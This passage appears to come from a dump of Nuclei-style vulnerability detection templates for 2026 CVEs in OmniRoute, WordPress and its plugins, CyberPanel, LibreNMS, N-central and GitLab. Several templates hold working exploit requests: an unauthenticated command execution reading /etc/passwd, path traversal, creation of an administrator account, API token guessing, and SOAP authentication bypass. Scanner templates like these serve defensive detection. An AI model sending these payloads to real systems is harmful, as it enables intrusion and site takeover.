https://github.com/diegosouzapw/OmniRoute/security/advisories/GHSA-hf57-cqmx-p4gr\n    - https://github.com/diegosouzapw/OmniRoute/pull/11028\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-88062\n  classification:\n    cvss-score: 9.5\n    cve-id: CVE-2026-88062\n    epss-score: 0.00943\n    epss-percentile: 0.59512\n    cwe-id: CWE-94,CWE-306\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: omniroute\n    product: omniroute\n    shodan-query: http.title:\"OmniRoute\"\n    fofa-query: title=\"OmniRoute\"\n  tags: cve,cve2026,omniroute,rce,unauth,ai,vkev\n\nvariables:\n  agentid: \"{{rand_base(8, 'acfhjnprx')}}\"\n  agentname: \"{{rand_base(8, 'acfhjnprx')}}\"\n  alias: \"{{rand_base(8, 'acfhjnprx')}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /api/acp/agents HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"id\":\"{{agentid}}\",\"name\":\"{{agentname}}\",\"binary\":\"node\",\"versionCommand\":\"node -e \\\"process.stdout.write(require('child_process').execSync('cat /etc/passwd').toString())\\\"\",\"providerAlias\":\"{{alias}}\",\"spawnArgs\":[],\"protocol\":\"stdio\",\"version\":\"\",\"installed\":true,\"isCustom\":true}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"json\")'\n          - 'regex(\"root:.*:0:0:\", body)'\n        condition: and\n# digest: 490a0046304402205071a9e1c88878320d7dde49450c8b1b3be0507ac9324c3835d47b2eda5800e20220249e921bc3669c863e7752b2b43971bfe1b7d8886f17bda5aae3724dcc3b95fc:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-88062.yaml","vuln_id":"cve-2026-88062"},{"raw":"id: CVE-2026-87902\n\ninfo:\n  name: WordPress Core - PHP Template Path Traversal\n  author: Hadrian,FLX\n  severity: critical\n  description: |\n    An unauthenticated attacker can make `get_page_template()` page-template resolution include a chosen readable local `.php` file outside the active theme directories. If relevant pre-conditions for both the server and the active theme are met, this can lead to RCE.\n  impact: |\n    An unauthenticated attacker can include local PHP files outside the active theme. Depending on the files present and the PHP configuration, this can disclose sensitive data or lead to arbitrary code execution.\n  remediation: |\n    Update WordPress to a patched maintenance release for the installed branch.\n  reference:\n    - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-7hp8-65ch-5whp\n    - https://github.com/WordPress/WordPress/commit/fdeab470f4b4062462cf8ccdc788f258683c2d6f\n    - https://hadrian.io/vulnerability-alerts/cve-2026-87902-working-poc-wordpress-critical-path-traversal\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N\n    cvss-score: 9.2\n    cve-id: CVE-2026-87902\n    cwe-id: CWE-98\n  metadata:\n    verified: true\n    max-request: 6\n    vendor: wordpress\n    product: wordpress\n    framework: wordpress\n    shodan-query: http.component:\"WordPress\"\n    fofa-query: app=\"WordPress\"\n  tags: cve,cve2026,wordpress,wp-core,lfi,unauth\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /wp-json/wp/v2/pages?per_page=1&_fields=id HTTP/1.1\n        Host: {{Hostname}}\n\n      - |\n        GET /?rest_route=/wp/v2/pages&per_page=1&_fields=id HTTP/1.1\n        Host: {{Hostname}}\n\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: false\n    stop-at-first-match: true\n\n    matchers:\n      - type: dsl\n        internal: true\n        dsl:\n          - 'regex(\"\\\"id\\\"\\\\s*:\\\\s*[0-9]+\", body) || regex(\"(?:page_id=|page-id-|page-item-)[0-9]+\", body)'\n          - 'status_code == 200'\n        condition: and\n\n    extractors:\n      - type: regex\n        name: page_id\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - '\"id\"\\s*:\\s*([0-9]+)'\n          - '(?:page_id=|page-id-|page-item-)([0-9]+)'\n\n  - raw:\n      - |\n        POST /?page_id={{page_id}}&pagename=templates%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fwp-includes%252Ftheme-compat%252Ffooter HTTP/1.1\n        Host: {{Hostname}}\n        Content-Length: 0\n\n      - |\n        POST /?page_id={{page_id}}&pagename=templates%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fwp-links-opml HTTP/1.1\n        Host: {{Hostname}}\n        Content-Length: 0\n\n    stop-at-first-match: true\n    redirects: false\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"<div id=\\\"footer\\\" role=\\\"contentinfo\\\">\", \"having the \\\"powered by\\\" link somewhere on your blog\") || contains_all(body, \"opml version\", \"generator=\\\"WordPress\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a004730450220781aa5dfe90882d37433c5de313eab267b12c160c659335abbff82c01b32797f022100eb1958c9a90e0e4c6f056eeeb1497ef277fbfe4a3e6692acbee98ec785837183:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-87902.yaml","vuln_id":"cve-2026-87902"},{"raw":"id: CVE-2026-87820\n\ninfo:\n  name: CyberPanel 2.4.3-2.4.5 - AI Scanner Debug Disclosure\n  author: 0x_Akoko\n  severity: medium\n  description: |\n    CyberPanel versions 2.4.3 through 2.4.5 expose unauthenticated AI Scanner debugging endpoints that disclose administrator usernames, API-key prefixes, scan identifiers, target domains, and account metadata. Unauthenticated attackers can enumerate panel administrators and recent scanner activity to inventory multi-tenant installations and facilitate follow-on attacks.\n  impact: |\n    Unauthenticated attackers can enumerate panel administrators, API key prefixes,hosted domains, and scan metadata CyberPanel instances.\n  remediation: |\n    Upgrade CyberPanel to 2.4.6\n  reference:\n    - https://github.com/usmannasir/cyberpanel/security/advisories/GHSA-qmwq-9cc8-x6h2\n    - https://github.com/usmannasir/cyberpanel/commit/20484fd\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-87820\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cwe-id: CWE-489\n    cve-id: CVE-2026-87820\n    epss-score: 0.00522\n    epss-percentile: 0.43283\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: cyberpanel\n    product: cyberpanel\n    shodan-query: http.title:\"Login - CyberPanel\"\n    fofa-query: title=\"Login - CyberPanel\"\n  tags: cve,cve2026,cyberpanel,debug,disclosure,unauth\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_any(tolower(body), \"cyberpanel\", \"usmannasir/cyberpanel\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /api/ai-scanner/list-api-keys HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"json\")'\n          - 'contains_all(body, \"api_key_prefix\", \"admin\", \"recent_scans\")'\n        condition: and\n# digest: 4a0a00473045022100abc306a921ffbb33d5dc2616b38b51058315a6a682cb1b994c54b57c12d1af6c02203d989d6daf3f9ecb87c465dcf9ccae757f0e0ff2d95b7fd08fb6a48d619b94a0:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-87820.yaml","vuln_id":"cve-2026-87820"},{"raw":"id: CVE-2026-8732\n\ninfo:\n  name: WP Maps Pro (wp-google-map-gold) <= 6.1.0 - Unauthenticated Administrator Account Creation\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    The WP Maps Pro plugin for WordPress is vulnerable to Privilege Escalation via Administrator Account Creation in all versions up to, and including, 6.1.0. This is due to the wpgmp_temp_access_ajax AJAX action being registered with wp_ajax_nopriv_ and protected only by a nonce check using the fc-call-nonce nonce, which is publicly embedded into every frontend page via wp_localize_script as the nonce field of the wpgmp_local JavaScript object, rendering the check ineffective as an access control mechanism. This makes it possible for unauthenticated attackers to invoke the wpgmp_temp_access_support handler with check_temp=false, which unconditionally creates a new WordPress user with the hardcoded role of administrator via wp_insert_user() and returns a magic login URL that, when visited, calls wp_set_auth_cookie() to fully authenticate the attacker as the newly created administrator, resulting in complete site takeover.\n  impact: |\n    Unauthenticated attackers can create administrator accounts and fully authenticate, leading to complete site takeover.\n  remediation: |\n    Update to the latest version beyond 6.1.0.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-8732\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-maps-pro/cve-2026-8732/\n    - https://github.com/xShadow-Here/CVE-2026-8732\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-8732\n    cwe-id: CWE-862\n    epss-score: 0.22728\n    epss-percentile: 0.97623\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: flippercode\n    product: wp-google-map-gold\n    fofa-query: body=\"/wp-content/plugins/wp-maps-pro/\"\n    publicwww-query: \"/wp-content/plugins/wp-maps-pro/\"\n    shodan-query: http.html:\"/wp-content/plugins/wp-maps-pro/\"\n  tags: cve,cve2026,wordpress,wp-plugin,wp-maps-pro,unauth,priv-esc,intrusive,vkev\n\nflow: http(1) && http(2)\n\nvariables:\n  username: \"{{rand_base(8)}}\"\n  email: \"{{rand_base(6)}}@{{rand_base(4)}}.com\"\n  password: \"{{rand_base(10)}}\"\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n        Accept: text/html,application/xhtml+xml\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"wpgmp_local\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: nonce\n        part: body\n        group: 1\n        regex:\n          - '\"wpgmp_local\"[^;]*\"nonce\"\\s*:\\s*\"([a-f0-9]+)\"'\n          - 'wpgmp_local\\s*=\\s*\\{[^}]*\"nonce\"\\s*:\\s*\"([a-f0-9]+)\"'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=wpgmp_temp_access_ajax&nonce={{nonce}}&check_temp=false&user_login={{username}}&user_email={{email}}&user_pass={{password}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'wpgmp_access='\n          - '\"wpgmp_access\":'\n          - 'login_url'\n          - 'user_id'\n        condition: and\n\n      - type: word\n        part: body\n        words:\n          - '\"success\":true'\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100d2bcce04577968f75cdc5067bd95dfffec869d9374f6035210cf43d195868ed6022100a9b92cabe15e4001a8c06aba286f385b40ecf3205e49bca922f00380072b67ff:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-8732.yaml","vuln_id":"cve-2026-8732"},{"raw":"id: CVE-2026-8713\n\ninfo:\n  name: Avada (Fusion) Builder <= 3.15.3 - Unauthenticated Arbitrary File Deletion\n  author: rool-machine\n  severity: critical\n  description: |\n    The Avada (Fusion) Builder plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the maybe_delete_files function. An unauthenticated attacker can delete arbitrary files on the server by manipulating the file_path parameter in the fusion_form_maybe_delete_files AJAX action. Deleting critical files like wp-config.php can lead to complete site takeover via reinstallation. This template detects the vulnerable version via homepage asset URL versioning (primary) and readme.txt Stable tag (fallback).\n  impact: |\n    An unauthenticated attacker can delete any file readable by the web server process, potentially leading to complete site compromise through wp-config.php deletion and WordPress reinstallation.\n  remediation:\n    Upgrade the Avada Builder (Fusion Builder) plugin to version 3.15.4 or later.\n  reference:\n    - https://www.wordfence.com/blog/2026/06/critical-unauthenticated-arbitrary-file-deletion-vulnerability-patched-in-avada-builder-wordpress-plugin/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-8713\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H\n    cvss-score: 9.1\n    cve-id: CVE-2026-8713\n    epss-score: 0.02669\n    epss-percentile: 0.85096\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: http.component:\"WordPress\" http.component:\"Avada\"\n    fofa-query: body=\"fusion-builder\" && body=\"WordPress\"\n    product: fusion-builder\n    vendor: theme-fusion\n    framework: wordpress\n  tags: cve,cve2026,wordpress,wp-plugin,avada,fusion-builder,file-deletion,passive,vkev\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"fusion-builder\"\n\n      - type: dsl\n        dsl:\n          - compare_versions(version, '<= 3.15.3')\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        group: 1\n        regex:\n          - \"fusion-builder/assets/css/media/fullwidth[^\\\"']*\\\\?ver=([0-9]+\\\\.[0-9]+(?:\\\\.[0-9]+)?)\"\n          - \"id=['\\\"]fb-[^'\\\"]+['\\\"]\\\\s+href=['\\\"][^'\\\"]*\\\\?ver=([0-9]+\\\\.[0-9]+(?:\\\\.[0-9]+)?)['\\\"]\"\n        internal: true\n\n      - type: regex\n        name: detected_version\n        part: body\n        group: 1\n        regex:\n          - \"fusion-builder/assets/css/media/fullwidth[^\\\"']*\\\\?ver=([0-9]+\\\\.[0-9]+(?:\\\\.[0-9]+)?)\"\n          - \"id=['\\\"]fb-[^'\\\"]+['\\\"]\\\\s+href=['\\\"][^'\\\"]*\\\\?ver=([0-9]+\\\\.[0-9]+(?:\\\\.[0-9]+)?)['\\\"]\"\n# digest: 4a0a00473045022100849b06b8eed349b0b4f55af2b5acc0019fdd4abf37f9b247a0b1c0cd6a83028c02205d3b9defbb41fcd507c712f469f6d4e05daf29602c86ae638d87bc2df9e62fc7:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-8713.yaml","vuln_id":"cve-2026-8713"},{"raw":"id: CVE-2026-8679\n\ninfo:\n  name: WordPress AudioIgniter <= 2.0.2 - Unauthenticated IDOR\n  author: 0x_Akoko\n  severity: high\n  description: |\n    The AudioIgniter plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 2.0.2. The handle_playlist_endpoint() function accepted a user-controlled playlist ID and returned track data without authentication.\n  impact: |\n    Unauthenticated attackers can access sensitive playlist metadata including private and draft content, leading to information disclosure.\n  remediation: |\n    Update to the latest version of AudioIgniter plugin.\n  reference:\n    - https://plugins.trac.wordpress.org/browser/audioigniter/trunk/audioigniter.php\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-8679\n    - https://wordpress.org/plugins/audioigniter/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-8679\n    epss-score: 0.01566\n    epss-percentile: 0.74215\n    cwe-id: CWE-639\n  metadata:\n    verified: true\n    max-request: 2\n    fofa-query: body=\"audioigniter_playlist_id\"\n  tags: cve,cve2026,wordpress,wp-plugin,audioigniter,idor,exposure,wp\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"audioigniter_playlist_id\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: playlist_id\n        part: body\n        regex:\n          - 'audioigniter_playlist_id=(\\d+)'\n        group: 1\n        internal: true\n\n  - raw:\n      - |\n        GET /?audioigniter_playlist_id={{playlist_id}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains_all(body, \"\\\"title\\\"\", \"\\\"audio\\\"\", \"\\\"subtitle\\\"\")'\n        condition: and\n# digest: 4a0a004730450221008d7dde8b6a44e71ac4db173b7d82f954748631d7a94677eaae91f52f19f16d73022063e7ea8ae7748dbdbab8eead902c1ae3684f3bc06eebd738cf60c66cb29a1727:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-8679.yaml","vuln_id":"cve-2026-8679"},{"raw":"id: CVE-2026-86426\n\ninfo:\n  name: LibreNMS <= 26.7.0 - Unauthenticated API Access\n  author: 0x_Akoko\n  severity: critical\n  description: |\n    LibreNMS <= 26.8.0 contains an authentication bypass caused by MySQL type coercion in the REST API token validation, letting unauthenticated attackers access protected endpoints and execute remote code via alert templates.\n  impact: |\n    Unauthenticated attackers can access protected API endpoints and execute remote code, leading to full system compromise.\n  remediation: |\n    Update to version 26.8.0 or later.\n  reference:\n    - https://github.com/librenms/librenms/security/advisories/GHSA-cvq8-gqfq-3mvg\n  classification:\n    cvss-score: 9.2\n    cwe-id: CWE-287\n  metadata:\n    verified: true\n    max-request: 11\n    vendor: librenms\n    product: librenms\n    shodan-query: http.title:\"LibreNMS\"\n    fofa-query: title=\"LibreNMS\"\n  tags: librenms,auth-bypass,type-confusion,api,unauth\n\nflow: |\n  if (http(1)) {\n    var guesses = [[0], 1, 2, 3, 4, 5, 6, 7, 8, 9];\n    for (var i = 0; i < guesses.length; i++) {\n      set(\"guess\", JSON.stringify(guesses[i]));\n      if (http(2)) break;\n    }\n  }\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(tolower(body), \"librenms\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /api/v0/devices HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"api_token\":{{guess}}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"json\")'\n          - 'contains_all(body, \"\\\"status\\\"\", \"\\\"ok\\\"\", \"\\\"devices\\\"\")'\n        condition: and\n# digest: 4a0a00473045022029c1fd64a3c709c8f706a0055b32bdb0ce8e61e4b09bb8debfb7d8edeac0a25e022100e84ed6a48b9c364ac97bc1406d038d005b496afa275bc3a69b24ef8108ec2176:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-86426.yaml","vuln_id":"cve-2026-86426"},{"raw":"id: CVE-2026-86218\n\ninfo:\n  name: N-able N-central <2026.3.1.14 - Pre-Authentication Remote Code Execution\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    N-able N-central versions before 2026.3.1.14 are vulnerable to pre-authentication remote code execution via static code injection (CWE-96). An unauthenticated attacker with network access to the N-central management interface can execute arbitrary code on the server, potentially compromising every managed endpoint under the platform's control. Huntress confirmed active in-the-wild exploitation. N-able's hosted (NCOD) instances were automatically patched, on-premises deployments require manual upgrade to 2026.3.1.14. The N-central build version is exposed pre-authentication in the login page JavaScript object (ncentralVersion), enabling reliable version-based detection.\n  impact: |\n    A successful exploit grants an unauthenticated attacker remote code execution on the N-central server with the service account's privileges, enabling full control of the N-central RMM platform and all managed endpoints, lateral movement to all customer networks managed by the MSP, credential harvesting from N-central's credential vault, and deployment of ransomware or backdoors across all managed infrastructure.\n  remediation: |\n    Upgrade N-central immediately to version 2026.3.1.14 (Hotfix 4) or later. Direct upgrade paths exist from builds 2025.4, 2026.1, 2026.2, 2026.3, and all 2026.3.1 hotfixes. Additionally restrict inbound access to N-central with IP allowlisting or VPN, audit N-central user accounts for unauthorized accounts (especially .invalid emails), and review appliance logs for evidence of pre-exploitation reconnaissance.\n  reference:\n    - https://me.n-able.com/s/security-advisory/aArVy00\n    - https://www.huntress.com/blog/n-able-vulnerability-exploitation\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-86218\n    - https://www.bleepingcomputer.com/news/security/n-able-patches-max-severity-n-central-flaw-amid-ongoing-attacks/\n    - https://forkast.news/n-able-n-central-cvss-10-0-pre-auth-rce-marks-third-attack-wave-in-six-weeks/\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-86218\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H\n    cvss-score: 10.0\n    cve-id: CVE-2026-86218\n    epss-score: 0.07494\n    epss-percentile: 0.94207\n    cwe-id: CWE-96\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: n-able\n    product: n-central\n    shodan-query: title:\"N-central\"\n    fofa-query: title=\"N-central Login Redirect\"\n  tags: cve,cve2026,n-able,n-central,rce,unauth,static-code-injection,kev,vkev,passive\n\nhttp:\n  - raw:\n      - |\n        GET /login HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"ncentralVersion:\")'\n          - 'contains(body, \"N-able N-central\")'\n        condition: and\n\n      - type: dsl\n        dsl:\n          - 'compare_versions(nc_version, \"< 2026.3.1.14\")'\n\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n\n    extractors:\n      - type: regex\n        name: nc_version\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - 'ncentralVersion:\\s*\"([0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+)\"'\n\n      - type: regex\n        name: detected_version\n        part: body\n        group: 1\n        regex:\n          - 'ncentralVersion:\\s*\"([0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+)\"'\n# digest: 4a0a0047304502205857fe68483e7e25721c05f3699a3642a8859d33596175d20591314d3d982cf402210091beeedf1a34f920faead468998db07eae9e56127536a5e7b69d938ee1d635b1:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-86218.yaml","vuln_id":"cve-2026-86218"},{"raw":"id: CVE-2026-86207\n\ninfo:\n  name: N-able N-central - Authentication Bypass\n  author: rapid7,DhiyaneshDk\n  severity: critical\n  description: |\n    An authentication bypass in N-central < 2026.3 HF 3 leads to authentication bypass in internal-only APIs.\n  impact: |\n    Attackers can bypass authentication, potentially gaining unauthorized access to internal APIs and sensitive data.\n  remediation: |\n    Upgrade N-able N-central to version 2026.3.1.13 (2026.3 Hotfix 3) or later.\n    Hosted N-central environments have already been patched by the vendor.\n  reference:\n    - https://www.rapid7.com/blog/post/ve-cve-2026-86206-cve-2026-86207-n-able-n-central-authentication-bypass-fixed/\n    - https://me.n-able.com/s/security-advisory/aArVy0000002LTNKA2/cve202686206-access-control-filter-bypass-allows-unauthorised-access-to-apis\n    - https://documentation.n-able.com/N-central/Release_Notes/GA/Content/N-central_2026.3_HF3_Release_Notes.htm\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-86207\n    epss-score: 0.00734\n    epss-percentile: 0.52961\n    cwe-id: CWE-287\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: n-able\n    product: n-central\n    shodan-query: title:\"N-central\"\n    fofa-query: title=\"N-central\"\n  tags: cve,cve2026,n-able,n-central,auth-bypass,2fa-bypass,soap,vkev\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        POST /dms;/services/ServerUI HTTP/1.1\n        Host: {{Hostname}}\n        Forwarded: for=\"127.0.0.\\1\"\n        Content-Type: text/xml; charset=utf-8\n        SOAPAction: \"\"\n\n        <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n        <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ei=\"http://ei.server.nable.com\">\n          <soapenv:Body>\n            <ei:sessionHello>\n              <ei:in0>3</ei:in0>\n            </ei:sessionHello>\n          </soapenv:Body>\n        </soapenv:Envelope>\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains_all(body, 'SessionID')\"\n          - \"contains(content_type, 'text/xml')\"\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: session_id\n        part: body\n        group: 1\n        regex:\n          - '<SessionID[^>]*>([0-9]+)</SessionID>'\n        internal: true\n\n  - raw:\n      - |\n        POST /dms;/services/ServerUI HTTP/1.1\n        Host: {{Hostname}}\n        Forwarded: for=\"127.0.0.\\1\"\n        Content-Type: text/xml; charset=utf-8\n        SOAPAction: \"\"\n\n        <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n        <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ei=\"http://ei.server.nable.com\">\n          <soapenv:Body>\n            <ei:userTwoFactorLogin>\n              <ei:sessionID>{{session_id}}</ei:sessionID>\n              <ei:userID>1</ei:userID>\n              <ei:password>dummy</ei:password>\n            </ei:userTwoFactorLogin>\n          </soapenv:Body>\n        </soapenv:Envelope>\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 500\"\n          - \"contains_all(body, 'ConfigProfileUtils.getConfigProfile()', 'NullPointerException')\"\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /dms;/services/ServerUI HTTP/1.1\n        Host: {{Hostname}}\n        Forwarded: for=\"127.0.0.\\1\"\n        Content-Type: text/xml; charset=utf-8\n        SOAPAction: \"\"\n\n        <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n        <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ei=\"http://ei.server.nable.com\">\n          <soapenv:Body>\n            <ei:customerList>\n              <ei:in0>{{session_id}}</ei:in0>\n              <ei:in1>1</ei:in1>\n              <ei:in2>true</ei:in2>\n              <ei:in3>false</ei:in3>\n            </ei:customerList>\n          </soapenv:Body>\n        </soapenv:Envelope>\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains_all(body, 'customerListResponse', '<CustomerID', '<CustomerName')\"\n          - \"contains(content_type, 'text/xml')\"\n        condition: and\n# digest: 490a0046304402205048c4d9fab6a68da5aa2434f4a5ca932e2be9f87944e0d440f195df30c44b75022072591c293b5345dc6b66b56c385e73283dbd9d8c1e1cd20b0db80da85cb10412:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-86207.yaml","vuln_id":"cve-2026-86207"},{"raw":"id: CVE-2026-86206\n\ninfo:\n  name: N-able N-central - Access Control Bypass via Path Confusion and Forwarded Header Spoofing\n  author: rapid7,DhiyaneshDk\n  severity: critical\n  description: |\n    A vulnerability in the N-central internal API access control filter allows unauthorised access to internal APIs. This is fixed in N-central 2026.3 HF3 and 2026.4\n  impact: |\n    Unauthorised attackers can access internal APIs, potentially leading to data exposure or manipulation.\n  remediation: Update to version 2026.3 HF3 or 2026.4.\n  reference:\n    - https://www.rapid7.com/blog/post/ve-cve-2026-86206-cve-2026-86207-n-able-n-central-authentication-bypass-fixed/\n    - https://me.n-able.com/s/security-advisory/aArVy0000002LTNKA2/cve202686206-access-control-filter-bypass-allows-unauthorised-access-to-apis\n    - https://documentation.n-able.com/N-central/Release_Notes/GA/Content/N-central_2026.3_HF3_Release_Notes.htm\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-86206\n    epss-score: 0.00676\n    epss-percentile: 0.50823\n    cwe-id: CWE-284\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: n-able\n    product: n-central\n    shodan-query: title:\"N-central\"\n    fofa-query: title=\"N-central\"\n  tags: cve,cve2026,n-able,n-central,auth-bypass,acl-bypass,soap,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /dms;/services/ServerUI HTTP/1.1\n        Host: {{Hostname}}\n        Forwarded: for=\"127.0.0.\\1\"\n        Content-Type: text/xml; charset=utf-8\n        SOAPAction: \"\"\n\n        <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n        <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ei=\"http://ei.server.nable.com\">\n          <soapenv:Body>\n            <ei:sessionHello>\n              <ei:in0>3</ei:in0>\n            </ei:sessionHello>\n          </soapenv:Body>\n        </soapenv:Envelope>\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(body, 'SessionID')\"\n          - \"contains(content_type, 'text/xml')\"\n        condition: and\n\n      - type: dsl\n        dsl:\n          - \"status_code == 500\"\n          - \"contains(body, 'ServerDMS')\"\n          - \"contains(content_type, 'text/xml')\"\n        condition: and\n# digest: 4a0a004730450220669cacc37a005a71b30ed05749211604d83f4cfc70c16c5e4a5f368e663308c4022100a439b258b17f44d769d38238b5f8d679667d5754d1c31719035d5fba7be660ac:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-86206.yaml","vuln_id":"cve-2026-86206"},{"raw":"id: CVE-2026-85706\n\ninfo:\n  name: GitLab CE/EE <=19.1.7/19.2.5/19.3.1 - Arbitrary File Read\n  author: FLX\n  severity: critical\n  description: |\n    GitLab CE/EE contains an unauthenticated arbitrary file read. Workhorse, the reverse proxy in front of Rails, matches upload routes using EscapedPath() and path.Clean without decoding percent sequences, while Puma decodes 